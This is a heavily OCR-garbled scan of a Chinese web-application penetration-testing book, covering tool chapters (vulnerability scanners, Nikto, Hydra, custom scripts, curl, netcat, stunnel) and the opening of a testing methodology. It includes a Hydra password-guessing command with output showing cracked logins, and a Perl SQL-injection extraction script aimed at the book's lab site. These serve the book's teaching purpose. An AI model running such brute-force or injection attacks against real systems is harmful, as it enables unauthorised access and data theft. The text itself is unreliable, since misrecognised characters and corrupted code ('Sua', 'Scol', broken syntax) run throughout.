处 于 所 需 的 状态 ,以 处 理 特定 的 攻击 请 求 。 我 们 在 第 14 章 介绍 了 在 定制 的 自动 化 攻击 中 实现 这 一 
目标 的 技巧 。 通常 ,采用 这 些 技巧 需要 进行 人 为 干预 ,以 了 解 相 关 要 求 、 对 测试 工具 进行 适当 地 
配置 ， 并 监视 它们 的 性 能 。 































































































20.3.4 当前 产品 


近年 来 ， 目 动 化 Web 扫描 带 市 场 有 了 很 大 发 展 ， 出 现 了 各 种 创新 ， 并 涌现 出 一 系列 不 同 的 产 
号 。 以 下 是 一 些 最 主要 的 扫描 带 : 


口 AcunetX 





DQ AppScan 
DQ Burp Scanner 
DQ Hallstorm 
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DQ NetSparker 
DQ N-Stalker 
DQ NIOSplder 
DD Skipfish 
DQ WebInspect 
虽然 大 多 数 成 熟 扫描 如 部 具备 相同 的 核心 功能 , 但是, 在 如 何 检测 不 同 汤 洞 区 域 ,以 及 向 用 
户 提供 的 功能 方面 , 这 些 扫 描 带 之 间 仍 然 存 在 差异 。 有 关 不 同 扫 摘 血 的 优点 的 公开 讨论 大 多 以 供 
应 商 之 间 的 口水 战 而 结束 。 尽管 人 们 进行 了 各 种 测试 来 评 佑 不 同 扫 质 和 大 在 检测 不 同类 型 的 安全 漏 
洞 方面 的 性 能 , 但 是 , 这 类 测试 始终 仅 限 于 将 扫 质 融 用 于 扫描 一 小 段 存在 缺陷 的 示例 代码 , 因此 ， 
这 些 测试 结 朱 并 不 足以 推断 扫描 天 在 各 种 实际 情况 下 的 性 能 。 
最 有 效 的 测试 方法 , 是 针对 大 量 源 目 真实 应 用 程序 的 示例 代码 运行 扫描 硕 ， 而 不 是 在 分 析 之 
前 为 供应 商 提供 基于 示例 代码 调整 其 产品 的 机 会 。 加 州 大 学 圣 芭 芭 拉 分 校 的 一 项 此 类 学 术 人 研究 声 
称 其 “在 所 测试 的 工具 数量 …… 以 及 所 分 析 的 漏洞 类 型 方面 ， 是 最 大 规模 的 Web 应 用 程序 扫描 天 
评 佑 ” 。 有 关 此 项 研究 的 报告 ， 请 从 以 下 URL 下 载 : 
WWwWw.cs.Ucsb.edu/~adoupe/statlc/black-box-scanners-dlmva2010.pdf 
这 项 研究 的 主要 绪论 如 下 : 
口 即使 是 最 先进 的 扫描 硕 ， 也 无 法 检测 出 所 有 类 型 的 狼 洞 ， 包 括 脆 弱 密 码 、 访 问 控制 不 完 
善 和 逮 辑 缺陷 。 
口 由 于 对 常用 客户 剖 技 术 文 持 不 完全 , 以 及 当前 应 用 程序 的 复杂 状态 化 特点 , 束 目 前 的 Web 
漏洞 扫描 带 而 言 ， 抓 取现 代 Web 应 用 程序 可 能 是 一 项 严峻 的 挑战 。 
口 价格 与 性 能 之 间 并 没有 明显 的 对 应 关系 。 一 些 免 费 或 价格 非常 低廉 的 扫描 融 与 那些 售 价 
数 千 美元 的 扫 摘 融 的 性 能 相当 。 
基于 扫描 大 确定 不 同类 型 汤 洞 的 能 力 , 这 项 研究 对 扫 措 融 进 行 了 打分 。 每 种 扫描 硕 的 总 得 分 
和 价格 如 表 20-1 所 示 。 


表 20-1 UCSB 针 对 不 同 扫描 器 的 漏洞 检测 性 能 与 价格 的 研究 报告 


























扫 描 器 分 数 价 格 
Acunetix 14 4995 一 6350 美 元 
WeblInspect 13 6000 一 30 000 美 元 
Burp Scanner 13 191 美 元 
N-Stalker 13 899 一 6299 美 元 
AppScan 10 17 550 一 32 500 美 元 
w3af 9 免费 
Paros 0 免费 
HailStorm 6 10 000 美 元 
NTOSpider 4 10 000 美 元 
MileSCAN 4 495 一 1495 美 元 
Grendel-Scan 3 免费 
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需要 注意 的 是 ， 近 年 来 ,扫描 带 的 扫描 能 力 已 有 了 显著 提高 ,并 可 能 会 继续 改进 。 个 体 扫 摘 
全 的 性 能 和 价格 可 能 会 随时 间 而 变化 。 表 20-1 中 的 报告 信息 于 2010 年 6 月 公布 。 

由 于 有 关 Web 漏 洞 扫 描 希 性 能 的 公开 信息 相对 较 少 ， 因 此 ， 在 做 出 购 灭 决 策 之 前 ,渗透 测 试 
员 需 要 日 己 进 行 这 方面 的 调查 。 大 多 数 扫描 带 供 应 两 部 提供 详细 的 产品 文档 及 其 软件 的 试用 版 
本 ， 渗 透 测 试 员 可 以 利用 这 些 信息 做 出 产品 选择 。 
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现实 情况 下 , 使 用 漏洞 扫描 玫 的 效率 高 低 很 大 程度 上 取决 于 所 针对 的 是 何 种 应 用 程序 。 根据 
应 用 程序 的 功能 及 其 包含 的 漏洞 种 类 , 我 们 上 面 介 绍 的 扫描 需 的 内 在 优 缺 点 会 以 不 同 的 方式 影响 
不 同 的 应 用 程序 。 

对 于 Web 应 用 程序 中 存在 的 各 种 常见 漏洞 ， 自 动 扫描 妖 能 够 发 现 其 中 大 约 一 半 的 漏洞 ， 它 们 
大 多 都 带 有 一 个 标准 签名 。 在 扫描 需 能 够 探测 到 的 各 种 漏洞 中 , 尽管 会 遗漏 那些 难以 发 现 与 不 党 
见 的 漏洞 , 但 它们 能 够 很 好 地 确认 特定 的 漏洞 。 总 之 ,进行 自动 扫描 能 够 确定 一 个 常见 应 用 程序 
中 存在 的 一 些 但 并 非 全 部 明显 的 漏洞 。 

如 果 是 一 名 渗透 测试 新 手 , 或 者 需要 在 有 限 的 时 间 内 攻击 一 个 大 型 应 用 程序 , 那么 进行 自动 
扫描 的 好 处 极其 明显 ， 因为 它 能 够 迅速 确定 一 些 需 要 进行 深入 手动 调查 的 线索 , 并 帮助 初步 确定 
应 用 程序 的 安全 状态 以 及 其 中 存在 的 漏洞 类 型 。 它 还 可 帮助 全 面 了 解 目 标 应 用 程序 , 并 确定 任何 
需要 仔细 分 析 的 特殊 区 域 。 

如 果 是 一 名 Web 应 用 程序 渗透 测试 专家 ， 并 且 和 希望 从 目标 应 用 程序 中 发 现 尽 可 能 多 的 漏洞 ， 
那么 ,需要 认识 漏洞 扫描 器 的 内 在 局 限 性 ， 并且 不 能 完全 相信 它们 ， 认 为 它们 能 够 发 现 每 一 个 漏 
洞 。 虽 然 扫 描 结 果 会 有 所 帮助 ， 并 提示 手动 调查 一 些 特殊 的 问题 ; 但 是 ,通常 我 们 希望 对 应 用 程 
序 的 每 个 功能 区 域 进 行 测试 ， 查 找 每 一 种 类 型 的 漏洞 ， 以 确信 对 其 进行 了 全 面 的 扫描 。 

当 使 用 漏洞 扫描 器 时 ， 必 须 始 终 记 住 以 下 一 些 要 点 ， 以 充分 利用 这 种 工具 。 

口 了 解 扫描 器 能 够 确定 和 不 能 够 确定 的 漏洞 类 型 。 

口 熟悉 扫描 需 的 功能 ， 知 道 如 何 对 其 进行 配置 ， 对 某 个 应 用 程序 进行 有 效 扫描 。 

口 在 运行 扫描 融 之 前 全 面 了 解 目 标 应 用 程序 ， 以 充分 利用 扫描 需 的 功能 。 

口 了 解 抓 取 强大 的 功能 和 上 自动 探查 危险 漏洞 草 含 的 风险 。 

口 始终 手动 核实 扫描 融 报 告 的 所 有 潜在 的 漏洞 。 

口 还 要 意识 到 ， 扫 描 需 可 能 会 造成 极 大 的 混乱 ， 在 服务 需 与 IDS 防 御 中 留 下 大 量 “ 指 纹 ”。 

如 果 想 要 保持 隐秘 ， 不 要 使 用 扫描 需 。 

全 自动 化 扫描 与 用 户 指导 的 扫描 

在 使 用 Web 扫 描 絮 时 , 一 个 主要 的 考虑 事项 ,是 渗透 测试 员 希 望 在 多 大 程度 上 指导 扫描 妖 完 
成 各 种 工作 。 这 方面 的 两 个 极端 用 例如 下 。 

口 为 扫描 需 提 供应 用 程序 的 URL， 单 击 “ 开 始 ”( Go )， 然 后 等 待 结 

口 进行 手动 操作 ， 使 用 扫描 吉 单 独 测试 每 个 请 求 ， 同 时 进行 手动 测试 。 
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独立 Web 扫 摘 带 更 适 于 第 一 种 用 例 。 整 合 到 集成 测试 套件 中 的 扫描 带 更 适 于 第 二 种 用 例 。 也 
就 是 说 ， 如 来 需要 ， 可 以 结合 采用 这 两 类 扫描 胡 。 

如 条 用 户 对 于 Web 应 用 程序 安全 不 甚 了 解 ， 或 需要 快速 评 佑 茶 个 应 用 程序 ， 或 需要 经 稍 处 理 
大 量 应 用 程序 , 则 可 以 通过 全 目 动 化 扫描 了 解 应 用 程序 的 一 部 分 受 攻击 面 。 这样 做 有 助 于 用 户 在 
硝 定 更 全 面 测试 的 效率 时 做 出 明智 的 决策 。 

如 打 用 户 了 解 Web 应 用 程序 安全 测试 的 整个 过 程 ， 以 及 全 目 动 化 测试 的 限制 ， 则 最 好 是 使 用 
集成 测试 套件 中 的 扫 朱 融 ， 从 而 为 手动 测试 过 程 提 供 文 持 ， 并 提高 手动 测试 的 效率 。 这 种 方法 有 
助 于 避免 全 目 动 扫描 融 面 临 的 诸多 技术 挑 成 。 渗 透 测 试 员 可 以 使 用 浏 览 锅 指导 扫描 硕 进行 操作 ， 
以 确保 不 会 遗漏 关键 的 功能 区 域 。 渗透 测 试 员 可 以 百 接 测 试 应 用 程序 后 成 的 、 其 中 包含 应 用 程序 
所 需 的 正确 内 容 和 请 求 格式 。 由 于 能 够 完全 控制 测试 过 程 ， 因 此 能 够 避 开 危险 功能 、 识 别 重 复 功 
能 ， 并 避 开 目 动 扫描 末 可 能 会 遇 到 困难 的 任何 输入 确认 。 此 外 , 由 于 可 以 收 到 有 关 扫 描 融 活动 的 
下 接 反 人 馈 ， 因而 可 以 确保 避免 与 验证 和 会 话 人 处理 机 制 有 关 的 问题 , 并 确保 正确 处 理 多 阶段 过 程 和 
有 状态 功能 造成 的 问题 。 通过 以 这 种 方式 使 用 扫描 各 , 可 以 覆盖 一 系列 可 以 自动 进行 检测 的 重要 
漏 润 ， 从 而 能 够 查找 需要 知 甘 和 经 验 才能 发 现 的 着 洞 类 型 。 
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除 前 面 讨论 的 工具 外 ， 在 特殊 情况 下 或 执行 特殊 任务 时 渗透 测试 员 还 可 以 使 用 许多 其 他 工 
具 。 在 本 章 的 剩余 部 分 ,我 们 将 介绍 其 他 几 种 攻击 应 用 程序 时 可 能 遇 到 或 需要 使 用 的 工具 。 需 要 
注意 的 是 , 以 下 内 容 仅仅 简要 介绍 了 笔者 曾 使 用 的 一 些 工 具 。 建 议 渗透 测试 员 调 查 各 种 可 用 的 工 
具 ， 并 选择 最 适合 目 己 需求 和 测试 风格 的 那些 工具 。 















































20.4.1 Wikto/Nikto 


Nikto 可 确定 Web 服 务 絮 上 默认 或 常见 的 第 三 方 内 容 。 它 包含 一 个 大 型 文件 和 目录 数据 库 , 其 
中 含有 Web 服 务 硕 上 的 默认 页 面 与 脚本 以 及 购物 篮 之 类 的 第 三 方 软件 。 基 本 上 ， 这 个 工具 轮流 请 
求 上 述 每 一 种 项 目 ， 然 后 探查 它们 是 否 存 在 。 

数据 库 会 频 蚂 更 新 ， 这 意味 看 Nikto 能 够 比 其 他 任何 目 动 或 手动 报 巧 更 有 效 地 确定 这 种 类 型 
的 内 容 。 

Nikto 包 含 大 量 可 通过 命令 行 或 基于 文本 的 配置 文件 指定 的 配置 选项 。 如 果 应 用 程序 使 用 定 
制 化 “未 发 现 ” 页 面 ， 活 透 测 试 员 可 以 通过 使 用 -404 设 置 避免 错误 警报 ， 该 设置 允许 指定 一 个 
出 现在 定制 错误 页 面 中 的 字符 串 。 

Wikto 是 Nikto 的 Windows 版 本 ， 该 版 本 新 增 了 一 些 功能 ， 如 增强 了 对 “未 发 现 ”响应 的 检测 
和 Google 辅 助 的 目录 挖掘 。 











20.4.2 ”Firebug 
Firebug 是 一 种 浏览 器 调试 工具 ， 使 用 它 可 以 在 当前 显示 的 页 面 上 调试 和 编辑 HTML 及 
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JavaScript 脚 本 ， 还 可 以 通过 它 浏览 和 编辑 DOM 。 
Firebug 具 有 非常 强大 的 功能 ， 可 用 于 分 析 和 利用 一 系列 客户 端 攻 击 ， 包 括 各 种 览 站 点 脚本 、 
请 求 伪 造 、UI 伪 装 和 里 域 数据 捕获 攻击 ( 如 第 13 半 所 述 )。 





20.4.3 Hydra 














Hydra 是 一 种 用 途 广泛 的 密码 猜测 工具 ， 可 用 于 攻击 Web 应 用 程序 常用 的 基于 表单 的 验证 。 
当然 ， 也 可 以 使 用 Burp Intruder 之 类 的 工具 以 完全 定制 的 方式 实施 这 种 攻击 ; 但 是 ， 在 许多 情况 
下 ，Hydra 也 一 样 有 用 。 

可 以 使 用 Hydra 指 定 目 标 URL、 相 关 请 求 参数 、 攻 击 用 户 名 和 密码 字段 的 单词 列表 ， 以 及 登 
录 失 败 后 返回 的 错误 消息 细节 。-t 设 置 可 用 于 指定 在 攻击 中 使 用 的 并 行 线程 的 数量 。 例 如 : 

C:\>hydra.exe -t 32 -L user.txt -P password.txt wahh-app.com http-post-form 

" /jlogin.asp:login name=^USER^&1ogin password=^PASS^&l1ogin=Login: Invaligdr" 


Hydra ve.4 (ci 2011 by van Hauser / THC - use allowed only for legal 
purposes. 

















Hydra (http://www.thc.org}) starting at 2011-05-22 16:32:48 


[IDATA] 32 tasks, 1 servers, 21904 login tries {1:148/p:148})}, ~684 tries per 
task 


[IDATA] attacking service http-post-form on port 80 

[STATUS] 397.00 tries/min, 397 tries in 00:01h, 21507 todo in 00:55h 

[80] [www-form] host: 65.61 .137.117 login: alice password: password 
[80] [www-form] host: 65.61.137.117 Jogin: 1jiz password: password 


20.4.4 定制 脚本 


根据 我 们 的 经 验 , 现 有 的 各 种 非 定 制 工具 足以 帮助 渗透 测试 员 完 成 在 攻击 Web 应 用 程序 时 所 
需 执 行 的 绝 大 多 数 任务 。 但 是 , 在 各 种 反常 情况 下 , 需要 目 行 建立 完全 定制 的 工具 和 脚本 来 解决 
必定 的 问题 ， 如 下 所 示 。 

口 应 用 程序 使 用 一 种 不 贡 见 的 会 话 处 理 机 制 ， 例 如 ， 需 要 使 用 必须 按 正确 顺序 重新 提交 的 


























每 页 面 令 牌 。 

口 布 望 利用 一 个 需要 重复 执行 几 个 特殊 步 又 的 独 洞 ， 将 在 一 个 啊 应 中 获取 的 数据 合并 到 随 
后 的 请 求 中 。 

口 如 末 确 定 一 个 次 在 恶意 的 请 求 ， 应 用 程序 会 立即 终止 会 话 ; 同时 ， 获 得 一 个 新 的 通过 验 


证 的 会 话 需 要 采取 几 个 非 标准 的 步 又 。 

口 需要 问 应 用 程序 所 有 者 提供 “ 指 回 并 单 击 ” 利 用 过 程 ， 以 演示 该 漏洞 及 其 风险 。 

如 采 会 编程 ， 那么 解决 这 个 问题 的 最 简单 方法 ,就 是 创建 一 个 完全 定制 的 小 型 程序 , 使 用 它 
发 布 相关 请 求 并 处 理应 用 程序 的 啊 应 。 可 以 把 这 个 程序 作为 一 个 独立 的 工具 , 或 者 作为 前 面 描述 
的 集成 测试 套件 的 扩展 ， 例 如 ， 通 过 使 用 Burp Extender 接 口 扩展 Burp Suite 或 Bean Shell 接 口 扩展 
WebsScarab 。 
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Perl 等 脚本 语言 包含 许多 可 用 于 迅速 建立 HTTP 通 信 的 库 ; 通常 , 仅 使 用 几 行 代码 就 可 以 执行 
定制 任务 。 即 使 编程 经 验 有 限 ,， 也 可 以 在 因特网 上 找到 一 段 脚本 ， 然 后 对 其 进行 调整 ， 以 满足 需 
求 。 下 面 以 一 段 简 单 的 Perl 脚 本 为 例 ， 它 利用 一 个 登录 表单 中 的 SQL 注入 漏洞 进行 递归 查询 ， 获 
取 数 据 表 中 指定 列 中 的 所 有 信 ， 并 将 获得 的 值 从 大 到 小 排列 〈 请 参阅 第 9 章 了 解 这 种 攻击 的 更 多 
详情 ): 

use HTTP: :Request: :Common; 

use LWP: :UserAgent:; 





Sua = LWP: :UserAgent->new(); 
my Scol = @ARGV[1]; 
my Sfrom stmt = QARGV[3]; 


1if (SH#ARGV!=3) { 
print "usage: perl sql.pl SELECT column FROM table\n"; 
exit; 


while(1) 
{ 


Spayload = "foo' or (1 in (select max($col) from S$from stmt 
stest))--"; 


my Sreq = POST "http://mdsec.net/addressbook/32/Default.aspx", 


[__VIEWSTATE => '', Name => S$payload, Email => 'john@test. 
Com', Phone => 
'12345', Search => 'Search', Address => '1 High Street', Age => 
"307,. 1， 
my Sresp = Sua->request (Sreq); 
my Scontent = S$resp->as_string; 


#print Scontent; 


if (Scontent =~ /nvarchar Value ' (.*)'/) 
{ 
print "$1i\n"; # print the extracted match 
} 
else 
Stest = "where S$col < 'S$1' 


} 





尝试 访问 


http://mdsec.net/addressbook/32/ 
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除 内 置 命令 与 库 外 ， 还 可 以 从 Perl 脚 本 与 操作 系统 shell 脚 本 中 调用 各 种 简单 的 工具 和 实用 工 
具 。 下 面 分 别 介 绍 几 个 这 样 的 工具 。 

1. Wget 

Weget 是 一 个 有 用 的 工具 ， 可 使 用 HTTP 或 HTTPS 获 取 一 个 特殊 的 URL。 它 支持 “下 行 ”代理 
服务 硕 、HTTP 验 证 和 其 他 各 种 配置 选项 。 

2. CUI| 

curl 是 一 个 用 于 发 布 HTTP 与 HTTPS 请 求 的 最 灵活 的 命令 行 工 具 。, 它 支持 GET 方 法 、POST 方 法 、 
请 求 参 数 、 客 户 端 SSL 证 书 和 HTTP 验 证 。 在 下 面 的 示例 中 ,重复 检索 页 面 标 题 ， 以 获得 10 ~ 40 
之 间 的 页 面 ID 值 。 

#1/bin/bash 

for 1 in ‘seq 10 40°， 

do 

echo -nn Si ": " 


























curl -s http://mdsec.net/app/ShowPage.ashx?PageNo==$i | grep -Pc 


"<title>t(.*)</title>»" | sed SS/ .， 9 Tn ‘ws 
done 
尝试 访问 
http://mdsec.net/app/ 
3. netcat 


netcat 是 一 个 功能 非常 强大 的 工具 ， 可 用 于 执行 各 种 与 网 络 有 关 的 任务 ; 它 还 是 许多 初学 者 
攻击 教程 的 基础 。 可 以 使 用 它 与 服务 器 建立 TCP 连 接 ， 发 送 一 个 请 求 并 获得 它 的 响应 。 除 以 上 用 
途 外 ，netcat 还 可 用 于 在 计算 机 上 创建 网 络 监 听 需 ， 接 收 所 攻击 的 服务 需 建 立 的 连接 。 请 参阅 第 9 
草 ， 了 人 解 使 用 这 种 技巧 在 数据 库 攻击 中 创建 一 个 带 外 通道 的 实例 。 

netcat 本 号 并 不 文 持 SSL 连 接 ; 但 将 它 与 下 面 描述 的 stunnel 工 具 结 合 ， 即 可 建立 SSL 连 接 。 

4. stunnel 

stunnel 在 使 用 目 己 的 脚本 或 其 他 本 身 并 不 支持 HTTPS 连 接 的 工具 时 非常 有 用 。stunnel 可 帮助 
渗透 测试 员 与 任何 主机 或 服务 融 SSL 套 接 字 建立 客户 端 SSL 连 接 ， 以 监听 任何 客户 端 提 出 的 连接 
请 求 。 由 于 HTTPS 只 是 一 种 通过 SSL 传 送 的 简单 HTTP 协 议 , 因此 可 以 使 用 stunne] 为 任何 其 他 工具 
提供 HTTPS 能 

例如 ， 下 面 的 命令 配置 stunnel 在 本 地 回环 接口 的 88 端 口上 建立 一 个 简单 的 TCP 服 务 需 套 接 
字 。 当 收 到 一 个 连接 时 ， 它 再 与 位 于 wahh-app.com 的 服务 化 进行 SSL 协 议 ， 通 过 SSL 信 道 将 进入 
的 明文 连接 转送 到 这 个 服务 硕 : 

C:\bin>stunnel -c -qd localhost:88 -r wahh-app.com:443 

2011.01.08 15:33:14 LOG5[1288:924]: Using 'wahh-app.com.443' as 

tcpwrapper service name 


2011.01.08 15:33:14 LOG5[1288:924]: stunnel 3.20 on x86-pcmingw32- 
gnu WIN32 























20.$ ”小 结 381 


现在 ， 可 以 将 任何 没有 SSL 能 力 的 工具 指 回 回环 接口 的 88 端 口 ， 使 它 通 过 HTTPS 与 目标 服务 
需 建 立 通信 ， 代 码 如 下 : 

2011.01.08 15:33:20 LOG5[1288:1000]: wahh-app.com.443 connected 

from 127.0.0.1:1113 


2011.01.08 15:33:26 LOG5[1288:1000]: Connection closed: 16 bytes 
sent to SSL, 392 bytes sent to socket 


20.5 小结 


本 书 主 要 介绍 的 是 攻击 Web 应 用 程序 时 渗透 测试 员 可 以 使 用 的 实用 技巧 。 尽管 只 需要 使 用 一 
个 浏览 硕 就 可 以 完成 其 中 一 些 任 务 ,， 但 是 , 要 对 应 用 程序 实施 全 面 有 效 的 攻击 ,需要 使 用 一 些 有 
用 的 工具 。 

拦截 代理 服务 天 是 工具 包 中 最 重要 、 也 是 必 不 可 少 的 工具 , 可 以 使 用 它 查 看 和 修改 浏览 希 与 
服务 带 之 间 传 送 的 所 有 流量 。 今 天 的 代理 服务 带 还 与 大 量 其 他 集成 工具 相互 补充 , 这 些 工 具 可 帮 
助 渗透 测试 员 目 动 完成 所 需要 执行 的 许多 任务 。 除 使 用 上 述 工 具 套 件 外 , 还 需要 使 用 一 个 或 几 个 
浏览 硕 扩 展 ， 带 助 渗透 测试 员 在 无 法 使 用 代理 服务 融 的 情况 下 继续 实施 攻击 。 

Web 应 用 程序 扫描 右 是 为 一 种 重要 工具 。 这 些 工具 能 够 迅速 有 效 地 发 现 一 系列 常见 的 源 洞 ， 
并 且 能 够 解析 和 分 析 应 用 程序 的 功能 。 即便 如 此 , 还 是 有 许多 安全 漏洞 它们 根本 无 法 确定 ; 因此 ， 
绝 不 能 依赖 它 来 确保 任何 应 用 程序 的 安全 。 

最 后 , 要 成 为 一 名 技术 熟练 的 Web 应 用 程序 渗透 测试 员 , 还 必须 了 解 Web 应 用 程序 的 运行 机 
制 、 它 们 的 防御 机 制 的 弱点 ， 并 了 解 如 何 探 查 其 中 存在 的 可 被 利用 的 漏洞 。 为 了 有 效 地 完成 这 
些 任 务 ， 逢 要 一 些 工 具 ， 以 了 解 应 用 程序 的 逻辑， 准确 控制 与 应 用 程序 的 交互 ， 并 在 必要 时 利 
用 目 动 控制 迅速 可 靠 地 实施 攻击 。 那 些 对 实现 这 些 目标 最 有 帮助 的 工具 ， 就 是 最 适合 使 用 的 工 
具 。 此 外 ， 如 有 果 现 有 的 工具 并 不 能 满足 需求 ， 也 可 以 建立 目 己 的 工具 。 事 实 上 ， 做 到 这 一 点 并 
不 是 很 困难 ! 















































Web 应 用 程序 渗透 测试 
方法 论 











章 介 绍 一 种 详细 的 进 阶 方法 论 ， 渗 透 测试 员 在 攻击 Web 应 用 程序 时 可 将 其 作为 指导 思 
想 。 它 洱 盖 了 本 书 描述 的 所 有 着 洞 与 攻击 拉 巧 。 虽然 执行 这 个 方法 论 中 的 所 有 步 又 并 
不 能 确保 发 现 某 个 应 用 程序 中 的 所 有 澳 洞 , 但 是 , 它 可 以 帮助 探查 应 用 程序 受 攻击 面 的 所 有 必要 
区 域 ， 并 利用 有 效 的 资源 发 现 尽 可 能 多 的 漏洞， 这 束 为 实现 渗透 测试 目的 提供 了 保证 。 
这 种 方法 论 探 查 的 主要 区 域 如 图 21-1 所 示 。 根 据 这 张 图 ， 我 们 将 深入 分 析 每 一 个 区 域 ， 并举 
例 说 明 其 中 的 每 一 项 任务 。 图 中 的 数字 与 后 文中 该 方法 论 使 用 的 分 级 数字 目录 相互 对 应 , 方便 读 
者 找到 相关 内 容 。 


0 识别 与 分 析 
21.1 解析 应 用 程序 内 容 


’ 21.2 分 析 应 用 程序 
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21.12 其 他 
检查 


图 21-1 ”本章 讨论 的 方法 论 中 包含 的 主要 区 域 
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这 个 方法 论 中 的 一 系列 任务 根据 它们 之 间 的 逻辑 依赖 关系 组 织 和 排序 。 我 们 将 尽 可 能 在 任务 
描述 中 重点 介绍 这 些 依赖 关系 。 但 是 ,实际 上 ,渗透 测试 员 往 往 需要 发 挥 目 己 的 想 绷 ， 思 考 应 采 
取 的 攻击 方 回 ， 并 根据 所 发 现 的 有 天目 标 应 用 程序 的 信息 指导 攻击 方向 ， 如 下 所 示 。 

口 在 茶 一 个 阶段 收集 到 的 信息 有 助 于 返回 到 前 一 个 阶段 ， 以 设计 更 有 针对 性 的 攻击 。 例 如 ， 
渗透 测试 员 可 以 利用 访问 控制 独 洞 获得 所 有 用 户 的 列表 ， 针 对 验证 功能 实施 更 有 效 的 密 
码 猜 测 攻击 。 

口 在 应 用 程序 的 某 个 区 域 发 现 的 一 个 关键 湄 洞 可 和 何 化 对 为 一 个 区 域 的 攻击 。 例 如 ， 渗 透 测 
试 员 可 以 利用 文件 泄露 漏洞 对 应 用 程序 的 关键 功能 进行 代码 审查 ， 而 不 是 育 目 地 探查 这 
些 功 能 。 

口 一 些 区 域 的 测试 结 来 有 助 于 确定 在 其 他 区 域 可 立即 探查 出 的 重复 出 现 的 着 洞 模 式 。 例 如 ， 
渗透 测试 员 可 以 利用 应 用 程序 输入 确认 过 滤 中 的 凋 见 漏洞 ， 迅 速 找到 在 几 种 不 同 的 攻击 
中 避 开 应 用 程序 的 防御 机 制 的 方法 。 

可 以 使 用 这 个 方法 论 中 列 出 的 步骤 作为 攻击 指导 , 并 把 它 作为 避免 蔓 忽 的 清单 , 但 不 一 定 要 

过 于 严格 地 巡 守 这 些 步 又 。 请 记 住 以 下 要 操 : 在 很 大 程度 上 , 我 们 摘 述 的 任务 部 属于 标准 的 常规 
性 任务 ; 要 对 Web 应 用 程序 实施 最 有 效 的 攻击 ， 渗 透 测试 员 必 须 充 分 发 挥 日 己 的 想象 力 。 


一 般 规 汇 


当 执行 攻击 Web 应 用 程序 所 需 的 详细 步 又 时 ， 应 该 始终 记 住 以 下 注意 事项 。 这 些 注意 事项 适 
用 于 所 有 必须 测试 的 区 域 以 及 需要 采用 的 各 种 技巧 。 
口 记 住 , 一 些 字 符 在 HTTP 请 求 的 不 同 部 分 具有 特殊 的 含义 。 当 修改 请 求 中 的 数据 时 ， 应 该 
对 这 些 字 符 进 行 URL 编 码 ， 以 确保 应 用 程序 按照 想 要 的 方式 解释 这 些 字 符 。 
@ & 用 于 分 隔 URL 查 询 字 符 串 与 消息 主体 中 的 参数 。 要 插入 一 个 字面 量 & 字 符 ， 必 须 将 其 
编 公 为 $26。 
= 用 于 分 隔 URL 查 询 字 符 串 与 消息 主体 中 每 个 参数 的 名 称 与 值 。 要 插入 一 个 字面 量 = 字 
从 ， 必 须 将 其 编码 为 $3d。 
?用 于 标记 URL 查 询 字 符 串 的 起 始 位 置 。 要 插入 一 个 字面 量 ? 字 符 , 必须 将 其 编码 为 $3£。 
空格 用 于 在 请 求 的 第 一 行 标记 URL 的 结束 位 置 ， 并 可 用 于 在 cookie 消 奶头 中 表示 一 个 
cookie 值 结束 。 要 插入 一 个 字面 量 空格 字符 ， 必 须 将 其 编码 为 820 或 +。 
因为 + 表示 一 个 编码 的 空格 ， 要 插入 一 个 字面 量 + 字符 ， 必 须 将 其 编码 为 $2b。 
四 ; 用 于 在 Cookie 消 息 头 中 分 隅 单个 的 cookie。 要 搬入 一 个 字面 量 ; 字符 ， 必 须 将 其 编 
公 为 $3pb。 
# 用 于 在 URL 中 标记 片段 标识 符 。 如 来 在 浏览 带 的 URL 中 输入 这 个 字符 ， 它 会 将 传送 给 
服务 硕 的 URL 稚 得 。 要 插入 一 个 字面 量 # 字 符 ， 必 须 将 其 编码 为 s23。 
@ 5 在 URL 编 码 方案 中 作为 前 缀 。 要 插入 一 个 字面 量 % 字 符 ， 必 须 将 其 编码 为 %s25。 
四 当然 ， 空 字 节 与 换行 符 等 非 打 印字 符 必 须 使 用 它们 的 ASCI 宇 符 代 码 进行 URL 编 码 。 空 
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字 节 与 换行 符 的 编码 分 别 为 500 和 %0a。 
口 此 外 ， 需 要 注意 ， 在 表单 中 输入 URL 编 码 的 数据 通常 会 导致 浏览 各 执行 男 一 层 编 码 。 例 
如 ， 在 表单 中 提交 %00 可 能 会 导致 问 服 务 占 发 送 值 82500。 为 此 ,通常 最 好 是 在 拦截 代理 
服务 大 中 查看 最 终 请 求 。 
口 许多 查找 常见 Web 应 用 程序 的 测试 需要 发 送 各 种 专门 设计 的 输入 字符 串 , 并 监控 应 用 程序 
的 啊 应 ， 从 中 搜索 表示 漏洞 存在 的 反常 现象 。 有 时 候 ， 无 论 是 否 提 交 某 个 特定 漏洞 的 触 
发 希 ， 应 用 程序 对 一 个 特殊 请求 的 啊 应 都 将 包含 这 个 漏洞 的 签名 。 只 要 提交 专门 设计 的 
特殊 输入 导致 了 与 某 个 漏洞 有 关 的 行为 ( 如 一 个 特殊 的 错误 消息 )， 就 应 该 重新 核查 ， 确 
定 在 相关 参数 中 提交 良性 输入 是 否 也 会 造成 相同 的 行为 。 如 有 果 两 种 输入 的 行为 相同 ， 那 
么 最 初 的 发 现 可 能 是 一 个 错误 警报 。 
口 通常 ， 应 用 程序 会 从 前 一 个 请 求 中 收集 一 定量 的 状态 ， 这 会 影响 它们 如 何 啊 应 随后 的 请 
求 。 有 了 时， 当 调 查 一 个 尚未 确定 的 汤 润 并 隔离 某 一 个 反常 行为 的 根源 时 ， 必 须 避 人 免 任 何 
收集 到 的 状态 信息 造成 的 影响 。 通 总 ， 使 用 一 个 新 的 浏览 硕 进 程 开始 另 一 个 会 话 ， 再 使 
用 良性 请 求 导 航 至 观测 到 发 生 反 和 的 位 置 ， 然 后 重新 提交 专门 设计 的 输入 ， 就 足以 达到 
这 个 目的 。 还 可 以 对 请 求 中 包含 的 cookie 和 组 存 信 息 进 行 调整 , 重复 利用 这 种 方法 。 此外， 
还 可 以 使 用 Burp Repeater 等 工具 隔离 一 个 请 求 ， 对 它 进行 一 些 调整 ,然后 根据 需要 重复 
多 次 发 布 这 个 请 求 。 
口 一 些 应 用 程序 使 用 一 种 负载 平衡 的 配置 ， 其 中 连续 的 HTTP 请 求 可 能 会 被 不 同 的 后 端 服务 
希 在 Web 层 、 展 现 层 、 数 据 层 或 其 他 层 处 理 。 不 同 服务 需 在 配置 上 的 细微 差异 可 能 会 影 啊 
到 处 理 绪 果 。 另 外 , 一 些 成 功 的 攻击 将 改变 处 理 请 求 的 某 一 侣 服务 需 的 状态 ,例如 在 Web 
